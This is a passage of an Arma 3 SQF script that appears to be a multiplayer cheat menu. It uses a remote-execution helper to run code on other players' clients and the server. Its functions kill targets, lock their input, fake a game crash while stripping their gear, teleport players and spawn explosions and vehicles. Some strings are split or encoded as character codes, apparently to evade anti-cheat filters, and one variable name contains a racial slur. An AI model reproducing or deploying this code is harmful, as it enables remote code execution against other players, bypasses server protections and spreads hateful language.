  3001. _object1 = createVehicle ['C_Quadbike_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  3002. _object1 attachTo [_origObject,[3,-1,1]];
  3003. };
  3004. ABC3={
  3005. _object1 = createVehicle ['B_SDV_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  3006. _object1 attachTo [_origObject,[0,2,3]];
  3008. _object1 = createVehicle ['B_SDV_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  3009. _object1 attachTo [_origObject,[0,6,3]];
  3011. _object1 = createVehicle ['B_SDV_01_F', _pos2, [], 0, 'CAN_COLLIDE'];
  3012. _object1 attachTo [_origObject,[0,10,3]];
  3013. };
  3016. Call ABC;
  3017. Call ABC2;
  3018. Call ABC3;
  3020. player action ['getInDriver',_origObject];
  3021. _code = {
  3022. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3023. LY_InvisTarget = {
  3024. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3025. _object = _this select 0;
  3026. _hide = _this select 1;
  3027. _object hideObject _hide;
  3028. };
  3029. };
  3030. [_code,true] call GEF_Rmote;
  3031. [format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};[objectfromnetid '%1',true] spawn LY_InvisTarget;",netid _origObject],true] call GEF_Rmote;
  3032. };
  3033. GEF_SpawnWeapon = {
  3034. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3035. _weapon = _this;
  3036. _veh = objnull;
  3037. call compile ('
  3038. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3039. _veh = createVe'+'hicle ["grou'+'ndWeaponHo'+'lder",position player,[],0,"CAN_COLLIDE"];
  3040. ');
  3041. _veh setposatl (getposatl player);
  3042. _veh addWeaponCargoGlobal [_weapon,1];
  3043. _mags = getArray(configfile >> 'cfgWeapons' >> _weapon >> 'magazines');
  3044. _mag = _mags select 0;
  3045. if(!isNil {_mag}) then {
  3046. _veh addMagazineCargoGlobal [_mag,5];
  3047. };
  3048. hint format["Weapon Spawned\n\n(look around on the ground!)"];
  3049. };
  3050. GEF_SpawnVehicle = {
  3051. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3052. if(isNil 'LY_PublishInjected') then {
  3053. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3054. [{
  3055. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3056. call compile ("
  3057. _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  3058. Publish_Vehicle = {
  3059. _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  3060. _name = _this select 0;
  3061. _pos = _this select 1;
  3062. _dir = _this select 2;
  3063. _obj = _name create" + "Vehicle _pos;
  3064. _obj setDir _dir;
  3065. };
  3066. ");
  3067. },false] call GEF_Rmote;
  3068. LY_PublishInjected = true;
  3069. uisleep 1;
  3070. };
  3071. _veh_type_LPMEnigg4=_this;
  3072. hint format["spawning %1",_veh_type_LPMEnigg4];
  3073. _dir = getdir vehicle player;
  3074. _poGEF_LP = getPos vehicle player;
  3075. _poGEF_LP = [(_poGEF_LP select 0)+8*sin(_dir),(_poGEF_LP select 1)+8*cos(_dir),0];
  3076. _xpos = _poGEF_LP select 0;
  3077. _ypos = _poGEF_LP select 1;
  3078. _zpos = _poGEF_LP select 2;
  3079. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + (str [_veh_type_LPMEnigg4, [_xpos,_ypos,_zpos],_dir]) + " spawn Publish_Vehicle;");
  3080. [_code,false] call GEF_Rmote;
  3081. cutText [format["%1 spawned",_veh_type_LPMEnigg4], "PLAIN DOWN"];
  3082. };
  3083. GEF_NeutralizeTarget = {
  3084. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3085. _target = _this call mp_GetObject;
  3086. [_target] call bis_fnc_NeutralizeUnit;
  3087. ['TaskSucceeded',['','The Target Has Been Neutralized!']] call bis_fnc_showNotification;
  3088. };
  3089. GEF_SheepBombTarget = {
  3090. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3091. if(isNil "LY_SheepBombsInit") then {
  3092. LY_SheepBombsInit = true;
  3093. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3094. LY_SheepBombs = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3095. _target = _this;
  3096. for '_i' from 0 to 10 do {
  3097. _agent = createAgent ["Sheep_random_F",(getpos _target),[],0,"NONE"];
  3098. [_agent] spawn {
  3099. sleep 5+(random 5);
  3100. _agent = _this select 0;
  3101. _pos = getpos _agent;
  3102. _agent setDamage 1;
  3103. deleteVehicle _agent;
  3104. "HelicopterExploSmall" createVehicle _pos;
  3105. };
  3106. };
  3107. };
  3108. };
  3109. [_code,false] call GEF_Rmote;
  3110. };
  3111. _target = _this call mp_GetObject;
  3112. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + "_target = objnull; {if(name _x == '"+_this+"') then {_target = _x;};} forEach playableunits; _target spawn LY_SheepBombs;");
  3113. [_code,false] call GEF_Rmote;
  3114. ['TaskSucceeded',['','Sheepy Sheepy Boomy Boomy >:)']] call bis_fnc_showNotification;
  3115. };
  3116. GEF_RainBowTarget = {
  3117. _toServer = {
  3118. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3119. Rainbow_Unit = {
  3120. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3121. _target = _this;
  3122. sleep 0.01;
  3123. while{true} do {
  3124. _alive = alive _target;
  3125. if(!_alive) exitwith {};
  3126. _color = format['#(rgb,8,8,3)color(%1,%2,%3,1)',random(1),random(1),random(1)];
  3127. Set_Texture = [_target,[_color,_color,_color,_color,_color]];
  3128. publicVariable "Set_Texture";
  3129. sleep 1;
  3130. };
  3131. };
  3132. };
  3133. _toClients = {
  3134. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3135. "Set_Texture" addPublicVariableEventHandler {
  3136. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3137. _arr = _this select 1;
  3138. _arr spawn bis_fnc_setObjectTexture;
  3139. };
  3140. };
  3141. [_toServer,false] call GEF_Rmote;
  3142. [_toClients,true] call GEF_Rmote;
  3143. _target = _this call mp_GetObject;
  3144. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + "_target = objnull; {if(name _x == '"+_this+"') then {_target = _x;};} forEach playableunits; _target spawn Rainbow_Unit;");
  3145. [_code,false] call GEF_Rmote;
  3146. ['TaskSucceeded',['','The Target Is Now Rainbowy!']] call bis_fnc_showNotification;
  3147. };
  3148. GEF_LightningStrikeTarget = {
  3149. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3150. _target = _this call mp_GetObject;
  3151. _pos = getpos _target;
  3152. _bolt = "LightningBolt" createVehicle _pos;
  3153. _bolt setdamage 1;
  3154. _light = "#lightpoint" createVehicle _pos;
  3155. _light setposatl [_pos select 0,_pos select 1,(_pos select 2) + 10];
  3156. _light setLightDayLight true;
  3157. _light setLightBrightness 300;
  3158. _light setLightAmbient [0.05, 0.05, 0.1];
  3159. _light setlightcolor [1, 1, 2];
  3161. sleep 0.1;
  3162. _light setLightBrightness 0;
  3163. sleep (random 0.1);
  3165. _class = ["lightning1_F","lightning2_F"] call bis_Fnc_selectrandom;
  3166. _lightning = _class createVehicle _pos;
  3169. _duration = if (isnull cursortarget) then {(3 + random 1)} else {1};
  3171. for "_i" from 0 to _duration do {
  3172. _time = time + 0.1;
  3173. _light setLightBrightness (100 + random 100);
  3174. waituntil {
  3175. time > _time
  3176. };
  3177. };
  3179. deletevehicle _lightning;
  3180. deletevehicle _light;
  3181. };
  3182. GEF_TPTOTarget = {
  3183. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3184. _target_peter_cus = _this;
  3185. {
  3186. if(name _x == _target_peter_cus) then {
  3187. _pos = getPos player;
  3188. _pos = [_pos select 0, _pos select 1, -100];
  3190. _aim_cause_pete_saysSO_cus = (vehicle player);
  3191. if (true) then
  3192. {
  3193. _aim_cause_pete_saysSO_cus setPosASL _pos;
  3194. };
  3195. _pos = getPos vehicle _x;
  3196. _dir_of_the_nigger_cus = getDir vehicle _x;
  3197. if (_x != vehicle _x) then
  3198. {
  3199. _pos = [(_pos select 0)-8*sin(_dir_of_the_nigger_cus),(_pos select 1)-8*cos(_dir_of_the_nigger_cus),(_pos select 2)+1];
  3200. }
  3201. else
  3202. {
  3203. _pos = [(_pos select 0)-2*sin(_dir_of_the_nigger_cus),(_pos select 1)-2*cos(_dir_of_the_nigger_cus),(_pos select 2)+1];
  3204. };
  3205. if (true) then
  3206. {
  3207. _aim_cause_pete_saysSO_cus setPosASL _pos;
  3208. _aim_cause_pete_saysSO_cus setDir _dir_of_the_nigger_cus;
  3209. };
  3210. };
  3211. } forEach playableUnits;
  3212. };
  3213. GEF_TPTargetTO = {
  3214. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3215. _target_sayGEF_peter = _this;
  3216. {
  3217. if(name _x == _target_sayGEF_peter) then {
  3218. _pos = getPos _X;
  3219. _pos = [_pos select 0, _pos select 1, -100];
  3221. _aim_peterSays = (vehicle _x);
  3222. if (true) then
  3223. {
  3224. _aim_peterSays setPosASL _pos;
  3225. };
  3226. _pos = getPos vehicle player;
  3227. _dir = getDir vehicle player;
  3228. if (player != vehicle player) then
  3229. {
  3230. _pos = [(_pos select 0)+8*sin(_dir),(_pos select 1)+8*cos(_dir),(_pos select 2)+1];
  3231. }
  3232. else
  3233. {
  3234. _pos = [(_pos select 0)+2*sin(_dir),(_pos select 1)+2*cos(_dir),(_pos select 2)+1];
  3235. };
  3236. if (true) then
  3237. {
  3238. _aim_peterSays setPosASL _pos;
  3239. };
  3240. };
  3241. } forEach playableUnits;
  3242. };
  3243. GEF_LockTarget = {
  3244. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3245. _name = _this;
  3246. {
  3247. if(name _x == _name) then {
  3248. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};disableUserInput true;},_x] call GEF_Rmote;
  3249. };
  3250. }foreach playableUnits;
  3251. };
  3252. GEF_UnlockTarget = {
  3253. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3254. _name = _this;
  3255. {
  3256. if(name _x == _name) then {
  3257. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};disableUserInput false;},_x] call GEF_Rmote;
  3258. };
  3259. }foreach playableUnits;
  3260. };
  3261. GEF_SpectateTarget = {
  3262. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3263. _name = _this;
  3264. {
  3265. if(name _x == _name) then
  3266. {
  3267. _x switchCamera "EXTERNAL";
  3268. hint format ["Spectating %1, press F10 to cancel", name _x];
  3269. };
  3270. } forEach playableUnits;
  3271. (findDisplay 46) displayAddEventHandler ['KeyDown', ' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};if ((_this select 1) == 0x44) then
  3272. {
  3273. player switchCamera "EXTERNAL";
  3274. }'];
  3275. };
  3276. GEF_KillTarget = {
  3277. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3278. _target = _this call mp_GetObject;
  3279. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};player setDamage 1;},_target] call GEF_Rmote;
  3280. };
  3281. GEF_ExplodeTarget = {
  3282. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3283. _target = _this call mp_GetObject;
  3284. _object = "HelicopterExploSmall" createvehiclelocal (getPosatl _target);
  3285. };
  3286. GEF_FuckTarget = {
  3287. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3288. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};[] spawn{startLoadingScreen ['Arma Crashed'];removeAllWeapons player;removeAllItems player;removeBackpack player;0 fadeSound 0;_unit = player;_unit setDamage 1;for '_i' from 0 to 100 do {(findDisplay _i) closeDisplay 0;};};};
  3289. _target = _this call mp_GetObject;
  3290. [_code,_target] call GEF_Rmote;
  3291. };
  3292. GEF_Paradrop = {
  3293. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3294. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};call compile toString [95,112,111,115,32,61,32,103,101,116,112,111,115,32,112,108,97,121,101,114,59,95,99,104,117,116,101,32,61,32,34,83,116,101,101,114,97,98,108,101,95,80,97,114,97,99,104,117,116,101,95,70,34,32,99,114,101,97,116,101,86,101,104,105,99,108,101,32,91,48,44,48,44,48,93,59,95,99,104,117,116,101,32,115,101,116,80,111,115,32,91,95,112,111,115,32,115,101,108,101,99,116,32,48,44,95,112,111,115,32,115,101,108,101,99,116,32,49,44,32,49,48,48,48,93,59,112,108,97,121,101,114,32,109,111,118,101,73,110,100,114,105,118,101,114,32,95,99,104,117,116,101,59];};
  3295. _target = _this call mp_GetObject;
  3296. [_code,_target] call GEF_Rmote;
  3297. };
  3298. Kit_Cop = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3299. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3300. _unit=player;
  3301. removeallweapons _unit;
  3302. removeVest _unit;
  3304. _unit addVest "V_Rangemaster_belt";
  3305. removebackpack _unit;
  3307. removeuniform _unit;
  3308. _unit addUniform "U_Rangemaster";
  3310. _unit addWeapon "hgun_P07_sndGEF_F";
  3311. player addWeapon "Binocular";
  3314. _magazines = getArray (configFile >> "CfgWeapons" >> "hgun_P07_sndGEF_F" >> "magazines");
  3316. {
  3317. player addmagazine _x;
  3318. player addmagazine _x;
  3319. player addmagazine _x;
  3320. player addmagazine _x;
  3321. }foreach _magazines;
  3323. reload player;
  3324. };
  3325. _target = _this call mp_GetObject;
  3326. [_code,_target] call GEF_Rmote;
  3327. };
  3328. Kit_Assault = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3329. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3330. _wset = player;
  3332. removeAllWeapons _wset;
  3333. removeAllItems _wset;
  3334. removebackpack _wset;
  3335. removeAllAssignedItems _wset;
  3337. _wset addHeadgear "H_Beret_02";
  3338. _wset addGoggles "G_Sport_Blackred";
  3339. _wset addUniform "U_IG_Guerilla3_1";
  3341. _wset addVest "V_BandollierB_cbr";
  3342. _wset addBackpack "B_Carryall_ocamo";
  3343. _wset addWeapon "NVGoggles";
  3344. _wset addWeapon "Rangefinder";
  3346. _wset addMagazine "30Rnd_556x45_Stanag";
  3347. _wset addweapon "arifle_TRG21_ACO_pointer_F";
  3349. _wset addMagazine "30Rnd_9x21_Mag";
  3350. _wset addweapon "hgun_P07_F";
  3352. _wset addMagazine "NLAW_F";
  3353. _wset addweapon "launch_NLAW_F";
  3355. _wset addPrimaryWeaponItem "optic_Aco";
  3356. _wset addPrimaryWeaponItem "muzzle_sndGEF_M";
  3358. _wset addHandgunItem "muzzle_sndGEF_L";
  3360. _wset addWeaponGlobal "ItemCompass";
  3361. _wset addWeaponGlobal "ItemMap";
  3362. _wset addWeaponGlobal "Itemgps";
  3363. _wset addWeaponGlobal "ItemWatch";
  3364. _wset addWeaponGlobal "itemradio";
  3366. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3367. (unitBackpack _wset) additemCargo ["30Rnd_556x45_Stanag", 9];
  3368. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3369. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3370. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3371. };
  3372. _target = _this call mp_GetObject;
  3373. [_code,_target] call GEF_Rmote;
  3374. };
  3375. Kit_Heavy = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3376. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3377. _wset = player;
  3379. removeAllWeapons _wset;
  3380. removeAllItems _wset;
  3381. removebackpack _wset;
  3382. removeAllAssignedItems _wset;
  3384. _wset addHeadgear "H_Beret_02";
  3385. _wset addGoggles "G_Sport_Blackred";
  3386. _wset addUniform "U_OG_leader";
  3388. _wset addVest "V_BandollierB_cbr";
  3389. _wset addBackpack "B_Carryall_ocamo";
  3390. _wset addWeapon "NVGoggles";
  3391. _wset addWeapon "Rangefinder";
  3393. _wset addMagazine "150Rnd_762x51_Box_Tracer";
  3394. _wset addweapon "LMG_Zafir_pointer_F";
  3396. _wset addMagazine "30Rnd_9x21_Mag";
  3397. _wset addweapon "hgun_P07_F";
  3399. _wset addMagazine "NLAW_F";
  3400. _wset addweapon "launch_NLAW_F";
  3402. _wset addPrimaryWeaponItem "optic_LRPS";
  3404. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3405. _wset addHandgunItem "muzzle_sndGEF_L";
  3407. _wset addWeaponGlobal "ItemCompass";
  3408. _wset addWeaponGlobal "ItemMap";
  3409. _wset addWeaponGlobal "Itemgps";
  3410. _wset addWeaponGlobal "ItemWatch";
  3411. _wset addWeaponGlobal "itemradio";
  3413. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3414. (unitBackpack _wset) additemCargo ["150Rnd_762x51_Box_Tracer", 9];
  3415. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3416. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3417. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3418. };
  3419. _target = _this call mp_GetObject;
  3420. [_code,_target] call GEF_Rmote;
  3421. };
  3422. Kit_DMR = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3423. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3424. _wset = player;
  3426. removeAllWeapons _wset;
  3427. removeAllItems _wset;
  3428. removebackpack _wset;
  3429. removeAllAssignedItems _wset;
  3431. _wset addHeadgear "H_Beret_02";
  3432. _wset addGoggles "G_Sport_Blackred";
  3433. _wset addUniform "U_O_GhillieSuit";
  3435. _wset addVest "V_BandollierB_cbr";
  3436. _wset addBackpack "B_Carryall_ocamo";
  3437. _wset addWeapon "NVGoggles";
  3438. _wset addWeapon "Rangefinder";
  3440. _wset addMagazine "10Rnd_762x51_Mag";
  3441. _wset addweapon "srifle_DMR_01_DMGEF_F";
  3443. _wset addMagazine "30Rnd_9x21_Mag";
  3444. _wset addweapon "hgun_P07_F";
  3446. _wset addMagazine "NLAW_F";
  3447. _wset addweapon "launch_NLAW_F";
  3449. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3450. _wset addHandgunItem "muzzle_sndGEF_L";
  3452. _wset addWeaponGlobal "ItemCompass";
  3453. _wset addWeaponGlobal "ItemMap";
  3454. _wset addWeaponGlobal "Itemgps";
  3455. _wset addWeaponGlobal "ItemWatch";
  3456. _wset addWeaponGlobal "itemradio";
  3458. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3459. (unitBackpack _wset) additemCargo ["10Rnd_762x51_Mag", 9];
  3460. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3461. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3462. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3463. };
  3464. _target = _this call mp_GetObject;
  3465. [_code,_target] call GEF_Rmote;
  3466. };
  3467. Kit_LLR = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3468. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3469. _wset = player;
  3471. removeAllWeapons _wset;
  3472. removeAllItems _wset;
  3473. removebackpack _wset;
  3474. removeAllAssignedItems _wset;
  3477. _wset addGoggles "G_Sport_Blackred";
  3479. _wset addUniform "U_O_CombatUniform_oucamo";
  3481. _wset addVest "V_BandollierB_cbr";
  3482. _wset addBackpack "B_Carryall_oucamo";
  3483. _wset addWeapon "NVGoggles";
  3484. _wset addWeapon "Rangefinder";
  3486. _wset addMagazine "7Rnd_408_Mag";
  3487. _wset addweapon "srifle_LRR_LRPGEF_F";
  3489. _wset addMagazine "30Rnd_9x21_Mag";
  3490. _wset addweapon "hgun_P07_F";
  3492. _wset addMagazine "NLAW_F";
  3493. _wset addweapon "launch_NLAW_F";
  3495. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3496. _wset addHandgunItem "muzzle_sndGEF_L";
  3498. _wset addWeaponGlobal "ItemCompass";
  3499. _wset addWeaponGlobal "ItemMap";
  3500. _wset addWeaponGlobal "Itemgps";
  3501. _wset addWeaponGlobal "ItemWatch";
  3502. _wset addWeaponGlobal "itemradio";
  3504. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3505. (unitBackpack _wset) additemCargo ["7Rnd_408_Mag", 9];
  3506. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3507. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3508. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3509. };
  3510. _target = _this call mp_GetObject;
  3511. [_code,_target] call GEF_Rmote;
  3512. };
  3513. Kit_Sniper = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3514. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3515. _wset = player;
  3517. removeAllWeapons _wset;
  3518. removeAllItems _wset;
  3519. removebackpack _wset;
  3520. removeAllAssignedItems _wset;
  3522. _wset addHeadgear "H_Beret_02";
  3523. _wset addGoggles "G_Sport_Blackred";
  3525. _wset addUniform "U_O_GhillieSuit";
  3527. _wset addVest "V_BandollierB_cbr";
  3528. _wset addBackpack "B_Carryall_ocamo";
  3529. _wset addWeapon "NVGoggles";
  3530. _wset addWeapon "Rangefinder";
  3532. _wset addMagazine "20rnd_762x51_mag";
  3533. _wset addweapon "srifle_ebr_f";
  3535. _wset addMagazine "30Rnd_9x21_Mag";
  3536. _wset addweapon "hgun_P07_F";
  3538. _wset addMagazine "NLAW_F";
  3539. _wset addweapon "launch_NLAW_F";
  3541. _wset addPrimaryWeaponItem "optic_sos";
  3542. _wset addPrimaryWeaponItem "muzzle_sndGEF_B";
  3543. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3544. _wset addHandgunItem "muzzle_sndGEF_L";
  3546. _wset addWeaponGlobal "ItemCompass";
  3547. _wset addWeaponGlobal "ItemMap";
  3548. _wset addWeaponGlobal "Itemgps";
  3549. _wset addWeaponGlobal "ItemWatch";
  3550. _wset addWeaponGlobal "itemradio";
  3552. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3553. (unitBackpack _wset) additemCargo ["20rnd_762x51_mag", 9];
  3554. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3555. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3556. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3557. };
  3558. _target = _this call mp_GetObject;
  3559. [_code,_target] call GEF_Rmote;
  3560. };
  3561. Kit_Sub = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3562. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3563. _wset = player;
  3565. removeAllWeapons _wset;
  3566. removeAllItems _wset;
  3567. removebackpack _wset;
  3568. removeAllAssignedItems _wset;
  3570. _wset addHeadgear "H_Beret_02";
  3571. _wset addGoggles "G_Sport_Blackred";
  3572. _wset addUniform "U_OrestesBody";
  3574. _wset addVest "V_BandollierB_cbr";
  3575. _wset addBackpack "B_Carryall_ocamo";
  3576. _wset addWeapon "NVGoggles";
  3577. _wset addWeapon "Rangefinder";
  3579. _wset addMagazine "30Rnd_9x21_Mag";
  3580. _wset addweapon "hgun_PDW2000_Holo_sndGEF_F";
  3582. _wset addMagazine "6Rnd_45ACP_Cylinder";
  3583. _wset addweapon "hgun_Pistol_heavy_02_YorriGEF_F";
  3585. _wset addMagazine "NLAW_F";
  3586. _wset addweapon "launch_NLAW_F";
  3589. _wset addPrimaryWeaponItem "muzzle_sndGEF_B";
  3590. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3593. _wset addWeaponGlobal "ItemCompass";
  3594. _wset addWeaponGlobal "ItemMap";
  3595. _wset addWeaponGlobal "Itemgps";
  3596. _wset addWeaponGlobal "ItemWatch";
  3597. _wset addWeaponGlobal "itemradio";
  3599. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3600. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3601. (unitBackpack _wset) additemCargo ["6Rnd_45ACP_Cylinder", 9];
  3602. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3603. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3604. };
  3605. _target = _this call mp_GetObject;
  3606. [_code,_target] call GEF_Rmote;
  3607. };
  3608. Kit_UAV = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3609. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3610. _wset = player;
  3612. removeAllWeapons _wset;
  3613. removeAllItems _wset;
  3614. removebackpack _wset;
  3615. removeAllAssignedItems _wset;
  3617. _wset addHeadgear "H_HelmetIA_camo";
  3618. _wset addGoggles "G_Sport_Blackred";
  3620. _wset addUniform "U_I_CombatUniform";
  3621. _wset addVest "V_PlateCarrierIA2_dgtl";
  3622. _wset addBackpack "B_UAV_01_backpack_F";
  3623. _wset addWeapon "NVGoggles";
  3624. _wset addWeapon "Rangefinder";
  3626. _wset addMagazine "30Rnd_556x45_Stanag";
  3627. _wset addweapon "arifle_Mk20_ACO_pointer_F";
  3629. _wset addMagazine "30Rnd_9x21_Mag";
  3630. _wset addweapon "hgun_P07_F";
  3632. _wset addMagazine "NLAW_F";
  3633. _wset addweapon "launch_NLAW_F";
  3635. _wset addPrimaryWeaponItem "muzzle_sndGEF_B";
  3636. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3637. _wset addHandgunItem "muzzle_sndGEF_L";
  3639. _wset additem "B_UavTerminal";
  3640. _wset addWeaponGlobal "ItemCompass";
  3641. _wset addWeaponGlobal "ItemMap";
  3642. _wset addWeaponGlobal "ItemWatch";
  3643. _wset addWeaponGlobal "itemradio";
  3645. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3646. (unitBackpack _wset) additemCargo ["30Rnd_556x45_Stanag", 9];
  3647. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3648. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3649. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3650. };
  3651. _target = _this call mp_GetObject;
  3652. [_code,_target] call GEF_Rmote;
  3653. };
  3654. Kit_Diver = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3655. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3656. _wset = player;
  3658. removeAllWeapons _wset;
  3659. removeAllItems _wset;
  3660. removebackpack _wset;
  3661. removeAllAssignedItems _wset;
  3663. _wset addHeadgear "H_Beret_02";
  3664. _wset addGoggles "G_Diving";
  3666. _wset addUniform "U_I_Wetsuit";
  3667. _wset addVest "V_RebreatherB";
  3668. _wset addBackpack "B_Carryall_ocamo";
  3669. _wset addWeapon "NVGoggles";
  3670. _wset addWeapon "Rangefinder";
  3672. _wset addMagazine "30Rnd_556x45_Stanag_Tracer_Red";
  3673. _wset addweapon "arifle_SDAR_F";
  3675. _wset addMagazine "30Rnd_9x21_Mag";
  3676. _wset addweapon "hgun_P07_F";
  3678. _wset addMagazine "NLAW_F";
  3679. _wset addweapon "launch_NLAW_F";
  3681. _wset addPrimaryWeaponItem "muzzle_sndGEF_B";
  3682. _wset addPrimaryWeaponItem "acc_pointer_IR";
  3683. _wset addHandgunItem "muzzle_sndGEF_L";
  3685. _wset addWeaponGlobal "ItemCompass";
  3686. _wset addWeaponGlobal "ItemMap";
  3687. _wset addWeaponGlobal "Itemgps";
  3688. _wset addWeaponGlobal "ItemWatch";
